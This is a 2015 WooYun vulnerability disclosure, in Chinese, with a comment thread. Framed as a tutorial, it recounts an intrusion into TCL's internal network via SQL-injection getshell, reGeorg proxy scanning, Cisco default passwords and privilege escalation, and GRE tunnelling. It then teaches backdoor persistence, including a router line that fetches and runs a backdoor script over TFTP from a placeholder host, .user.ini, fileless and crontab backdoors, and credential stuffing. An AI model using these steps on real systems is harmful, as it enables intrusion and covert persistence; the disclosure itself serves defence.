从TCL某漏洞看内网渗透教学分享之内网信息探测和后渗透准备

漏洞概要

缺陷编号:WooYun-2015-097180

漏洞标题:从TCL某漏洞看内网渗透教学分享之内网信息探测和后渗透准备

相关厂商:TCL集团财务有限公司

漏洞作者:redrain有节操

提交时间:2015-02-18 23:24

公开时间:2015-04-04 23:26

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2015-02-18: 细节已通知厂商并且等待厂商处理中
2015-02-27: 厂商已经确认,细节仅向厂商公开
2015-03-09: 细节向核心白帽子及相关领域专家公开
2015-03-19: 细节向普通白帽子公开
2015-03-29: 细节向实习白帽子公开
2015-04-04: 细节向公众公开

简要描述:

本来打算发人人网的,但是苦逼的是我刚进去内网就貌似被t出来了,服务器直接宕了,等下次案例发人人或者其他厂商吧在内网渗透中,内网信息探测对你的渗透工作开展是否顺利至关重要,如果你能摸清楚目标内网的信息,就像开启了god mode
这个案例中,我们介绍几个基本的内网探测的手法,以及如何在实战中串联十八般武艺,获取这个god mode

详细说明:

常规的,从web业务撕开口子url:bit.tcl.comgetshell很简单,phpcms的,一个Phpcms V9 uc api SQL的老洞直接getshell,拿到shell,权限很高,system看看网卡信息

只有一块网卡,处于10.4.22的私网地址在这里,如果我们想要通过这台机器对内网进行渗透,首要工作就是进行内网探测,介绍几个方法0x00如果你只是需要对内网的业务主机进行渗透,那么可以优先查看一下hosts,针对hosts中的主机针对性渗透0x01如果想要对整个C段主机进行渗透,比较完整方便的方法还是扫描,这里就需要我们进行内网代理,然后扫描正向代理or反向代理,因为此处主机无法通外网,所以我们选择正向代理一个我常用的代理reGeorghttps://github.com/sensepost/reGeorg上传代理脚本,然后用regerog尽心代理链接(regeorg需要urllib3,所以各位需要用到时,先安装这个模块)

用nmap等进行代理扫描,很简单可以使用proxychains或者win 下使用proxycap因为我们这里指定的端口时2333,所以修改一下proxychains的conf

以此来尽心内网C段的信息探测0x02当然,仅仅通过扫描,并不能获取到最全面的信息,最全面的信息,要么就是我们拿到了内网拓扑,或者,我直接日下了路由器路由器,走你~通过之前的nmap扫描,我们大概知道了开放web服务的主机

访问11,12,13三台主机后,发现时cisco的路由器,且是开放web管理的cisco路由器,默认密码cisco成功进入

开放web管理的思科路由是可以在web端执行命令的,但是我们的路由权限只是1,cisco的权限分级大概是这样:管理员是7 ,但是有15个权限分级,15的权限基本属于为所欲为权限在这里,因为看到当前路由ios版本号是

低版本的iOS可以利用我之前的一个老洞进行cisco路由提权因为在web端,可以用privilege15进行命令操作

这样我们就拥有了一个privilege15的用户,赶紧telnet进路由看看配置,一定会有惊喜

看到我们确实拿到了privilege15的用户那么,来瞅瞅路由配置吧

几个业务,DB,办公的vlan跃然于眼前,当前我们实在web vlan的其他两台路由也一样到玩法===================分割线==================那么有的同学就问了,如果我不满足于在web vlan闹腾,如果我作为一个黑阔,我要去办公vlan去耍怎么办,哟西~既然我们都已经控制了路由啦,当然可以去闹!因为我不是运维狗,所以咨询了z8大屌,他告诉我,少年,你听过GRE隧道么,诶嘿~

http://itchenyi.blog.51cto.com/4745638/1137143http://www.codesky.net/article/201207/171461.html大家可以参考这两个地方通过GRE隧道配置,我们就可以跑到另外一个vlan去闹了~(做人留一线,日后好相见,就不截图call_center的vlan了,渗透其网段的思路也和之前介绍的一样)=========分割线==============那么又有同学举手了,如果我渗透的目标无法短时间内就完成,需要进行后渗透,我怎么样才能让我之后的渗透也方便呢?好的,同学你很猥琐,这里介绍几个平时我们工作中常用的留后门多法子首先,这个cisco的路由后门,我们肯定要优先留一个cisco路由器支持TCL cisco脚本,所以我们的后门也通过这个来完成

这是老外写的一个后门,先在路由中开启tclsh模式,然后引入后门脚本Router#tclshRouter(tcl)#source tftp://x.x.x.x/backdoor.tcl这样我们就留下来后门,下次链接可以直接在网段内的机器直接nc 路由ip 1234(端口在后门脚本中修改)ok,如果web的入口断了,这一切都白搭,所以我们还应该对web的机器留下比较隐藏的后门说两个,一个是文件形的后门这个办法之前phinthon老师已经说过了,就是通过php.ini或者user.ini留后门在一个有正常php文件的目录下新建一个.user.ini内容为auto_prepend_file=xxx.gif(png/jpg)之类而你的xxx.gif之类就是你的后门具体可以参考http://www.wooyun.org/drops/tips-3424第二个办法,非文件形的后门,这样的后门优势在于非常隐蔽,一般的网管都发现不了,但是有一个非常大的缺点,重启,或者进程中断后门就消失了原理大概是:后门的代码第一行删除自身,然后驻留在后台内存里,等待外部链接

在xxx.txt中写入你的后门代码,访问后就会删除自己并循环执行txt的代码,这是之前某人写过的了ztz最近有写了一个更赞的无文件后门,你们快去找他要除了这样的,如果主机是linux,也可以用前段时间猪猪侠说的crontab做后门

漏洞证明:

我们来大概总结一下这次渗透,首先通过外部业务撕开入口,通过代理的方式对内网进行探测,发现了cisco路由,于是利用之前的漏洞进行提权,搞定了路由器,整个vlan划分展露无遗,开启godmode因为我们这里是概念性的测试,所以尺度不能太大,但是,如果我是一个黑客,我接下来会做的事儿:利用tunna转发3389出外网链接(但是在这个场景中,出外网限制了部分端口,但是可以查询dns,我们应该利用端口复用的方式),远程桌面后扩大战果(嗅探其他机器)读数据库我们看到了很多tcl的员工用户数据,可以直接对tcl的企业邮箱直接撞裤攻击

因为路由器搞定了,跨vlan到另外的段,继续进行渗透概念性证明图:

修复方案:

修复主要看这么几个地方:外部业务,及时打补丁,控制权限内网弱口令问题内网主机及时补丁路由器及时升级你们的OPS后台还存在测试用户登陆的问题,此处的漏洞说明就不截图了

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-02-2715:45

厂商回复:

非常感谢您的反馈,我们将会联系酷友公司进行相应的调整。

最新状态:

暂无

评价

  1. 2010-01-01 00:00 黑暗游侠 白帽子 | Rank:1058 漏洞数:93)

    你是炊bb徒弟?

  2. 2010-01-01 00:00 redrain有节操 白帽子 | Rank:168 漏洞数:23)

    @黑暗游侠 明显不是,你为啥这么认为

  3. 2010-01-01 00:00 黑暗游侠 白帽子 | Rank:1058 漏洞数:93)

    @redrain有节操 以前听他说过你,然后以前也看到过redrain这个名字

  4. 2010-01-01 00:00 redrain有节操 白帽子 | Rank:168 漏洞数:23)

    @黑暗游侠 原来还有个我?

  5. 2010-01-01 00:00 黑暗游侠 白帽子 | Rank:1058 漏洞数:93)

    @redrain有节操 你签名是猪头子你师父,猪头子好像也是炊bb徒弟。。。

  6. 2010-01-01 00:00 黑暗游侠 白帽子 | Rank:1058 漏洞数:93)

    @redrain有节操 就是ztz,ztz肯定是

  7. 2010-01-01 00:00 redrain有节操 白帽子 | Rank:168 漏洞数:23)

    @黑暗游侠 我开玩笑的,@猪头子 是个狗~我是人噻

  8. 2010-01-01 00:00 _Thorns 白帽子 | Rank:796 漏洞数:60)

    0 0 围观下

  9. 2010-01-01 00:00 Jumbo 白帽子 | Rank:52 漏洞数:5)

    @黑暗游侠 我开玩笑的,@猪头子 是个狗~我是人噻

  10. 2010-01-01 00:00 数据流 白帽子 | Rank:794 漏洞数:95)

    黑客还不睡啊

  11. 2010-01-01 00:00 请叫我小号 白帽子 | Rank:0 漏洞数:0)

    为什么不审洞呢?@疯狗

  12. 2010-01-01 00:00 phith0n 白帽子 | Rank:644 漏洞数:62)

    跪舔redrain湿傅

  13. 2010-01-01 00:00 redrain有节操 白帽子 | Rank:168 漏洞数:23)

    @phith0n 我只是来2015年打卡以及膜拜phith0n师傅的

  14. 2010-01-01 00:00 刘海哥 白帽子 | Rank:110 漏洞数:12)

    @phith0n 我只是来2015年打卡以及膜拜phith0n师傅的

  15. 2010-01-01 00:00 存在敏感词 白帽子 | Rank:61 漏洞数:5)

    @黑暗游侠 居然还有人记得brk.. 感动

  16. 2010-01-01 00:00 Power 白帽子 | Rank:29 漏洞数:7)

    @存在敏感词 消失好久了....

  17. 2010-01-01 00:00 第四维度 白帽子 | Rank:40 漏洞数:4)

    果然被雷劈了

  18. 2010-01-01 00:00 T0ne5 白帽子 | Rank:0 漏洞数:0)

    WY牛多

  19. 2010-01-01 00:00 动后河 白帽子 | Rank:30 漏洞数:3)

    good大牛

  20. 2010-01-01 00:00 子非海绵宝宝 白帽子 | Rank:1220 漏洞数:113)

    我就习惯这种教学漏洞 能学到很多思路技术

  21. 2010-01-01 00:00 ki11y0u 白帽子 | Rank:72 漏洞数:7)

    我就习惯这种教学漏洞 能学到很多思路技术

  22. 2010-01-01 00:00 s0mun5 白帽子 | Rank:340 漏洞数:24)

    汪汪汪

  23. 2010-01-01 00:00 夏殇 白帽子 | Rank:15 漏洞数:3)

    汪汪汪

  24. 2010-01-01 00:00 咸鱼翻身 白帽子 | Rank:295 漏洞数:32)

    刚看到忽略的说。。。。。。啥情况

  25. 2010-01-01 00:00 scanf 白帽子 | Rank:1161 漏洞数:100)

    这也行

  26. 2010-01-01 00:00 zeracker 白帽子 | Rank:1028 漏洞数:134)

    单曲循环:
    《301祝大家羊年大吉》·mp3
    ▬▬▬▬▬◙▬▬▬▬▬▬▬▬
    ◂◂  ►  ▐▐   ▸▸

  27. 2010-01-01 00:00 小龙 白帽子 | Rank:1634 漏洞数:152)

    @咸鱼翻身 刚才不是公开的吗,汗!!! 我还看完了呢……

  28. 2010-01-01 00:00 咸鱼翻身 白帽子 | Rank:295 漏洞数:32)

    一堆代码。。。。

  29. 2010-01-01 00:00 一天到晚吃 白帽子 | Rank:50 漏洞数:7)

    留名

  30. 2010-01-01 00:00 Th1nk 白帽子 | Rank:35 漏洞数:3)

    redrain老师快去博客发布内部教程。跪舔。

  31. 2010-01-01 00:00 todaro 白帽子 | Rank:30 漏洞数:3)

    坐等受教育

  32. 2010-01-01 00:00 李旭敏 白帽子 | Rank:562 漏洞数:59)

    资深赛棍

  33. 2010-01-01 00:00 有妹子送上 白帽子 | Rank:61 漏洞数:10)

    啪啪啪

  34. 2010-01-01 00:00 忆苦思甜 白帽子 | Rank:35 漏洞数:5)

    真想看看,最近一直在看TCL的分站。

  35. 2010-01-01 00:00 小呆呆 白帽子 | Rank:33 漏洞数:4)

    这是要连载的节奏啊

  36. 2010-01-01 00:00 f4ckbaidu 白帽子 | Rank:215 漏洞数:21)

    mark学习

  37. 2010-01-01 00:00 小胖子 白帽子 | Rank:1429 漏洞数:107)

    肯定又是被ZTZ吊打了一晚上想出来的淫荡招数!

  38. 2010-01-01 00:00 mango 白帽子 | Rank:1662 漏洞数:152)

    用nmap等进行代理扫描,很简单可以使用proxychains或者win 下使用proxycap

  39. 2010-01-01 00:00 mango 白帽子 | Rank:1662 漏洞数:152)

    proxychains需要设置吧

  40. 2010-01-01 00:00 _Thorns 白帽子 | Rank:796 漏洞数:60)

    @mango proxifier 也不错哦。

  41. 2010-01-01 00:00 疯子 白帽子 | Rank:254 漏洞数:39)

    @黑暗游侠 居然还有人记得brk.. 感动(炊B一去不复返)

  42. 2010-01-01 00:00 mango 白帽子 | Rank:1662 漏洞数:152)

    @_Thorns 这个只了解win的

  43. 2010-01-01 00:00 _Thorns 白帽子 | Rank:796 漏洞数:60)

    算是GRE隧道的应用和TCL后门应用把,这东西偏网络层了,赞一个!
    http://drops.wooyun.org/tips/85

  44. 2010-01-01 00:00 肉肉 白帽子 | Rank:91 漏洞数:10)

    我ztz师傅说你们谁想要那个后门的先来我这里交定金

  45. 2010-01-01 00:00 lion(lp) 白帽子 | Rank:115 漏洞数:14)

    额,楼主,你日的是台交换机。。。

  46. 2010-01-01 00:00 Vinc 白帽子 | Rank:243 漏洞数:24)

    不错

  47. 2010-01-01 00:00 darker 白帽子 | Rank:11 漏洞数:1)

    师傅,我回来了。

  48. 2010-01-01 00:00 f4ckbaidu 白帽子 | Rank:215 漏洞数:21)

    那是台cisco三层交换

    话说我没看懂为什么要用GRE,直接通过三层路由不就过去了吗

  49. 2010-01-01 00:00 scanf 白帽子 | Rank:1161 漏洞数:100)

    额,通过三层路由到公网不是更方便吗?

  50. 2010-01-01 00:00 BeenQuiver 白帽子 | Rank:50 漏洞数:6)

    nmap如何扫描弱口令啊

  51. 2010-01-01 00:00 炊烟 白帽子 | Rank:115 漏洞数:10)

    这是kali?

  52. 2010-01-01 00:00 Hax0rs 白帽子 | Rank:17 漏洞数:2)

    完全看不懂啊

  53. 2010-01-01 00:00 depycode 白帽子 | Rank:221 漏洞数:21)

    GRE tunnel
    interface Tunne100
    ip address x.x.x.x 255.255.255.252
    ip mtu 1500
    ip tcp adjust-mss 1400
    tunnel source x.x.x.x
    tunnel destination x.x.x.x

  54. 2010-01-01 00:00 金枪银矛小霸王 白帽子 | Rank:93 漏洞数:8)

    GRE隧道还是不懂。。

  55. 2010-01-01 00:00 wy007 白帽子 | Rank:100 漏洞数:8)

    GRE隧道其实就是VPN的一种形式,思科本身支持非常多的VPN类型,包括很多私有VPN协议,不明白的可以去看看思科安全方向(SP)课程里知识点必讲的,既然三层交换都控制了,直接加几条静态路由岂不是更方便

  56. 2010-01-01 00:00 迪南 白帽子 | Rank:147 漏洞数:10)

    win下用proxifier全局代理,nmap竟然不走。。。。。telnet、firefox都走代理了啊

  57. 2010-01-01 00:00 老实先生 白帽子 | Rank:17 漏洞数:2)

    必须关注此老师

  58. 2010-01-01 00:00 海绵宝宝 白帽子 | Rank:257 漏洞数:37)

    @迪南 不支持ICMP,所以在代理使用nmap的时候需要使用 –sT -Pn参数

  59. 2010-01-01 00:00 小牛牛 白帽子 | Rank:60 漏洞数:4)

    洞主,请教个问题。我这边遇到这么一个情况。regeorg代理成功监听8080端口。然后再kali下。使用proxychains来调用Nmap扫描代理目标内网的主机。但是不走目标代理的内网。除了HTTP协议,别的根本不走,请教下为什么啊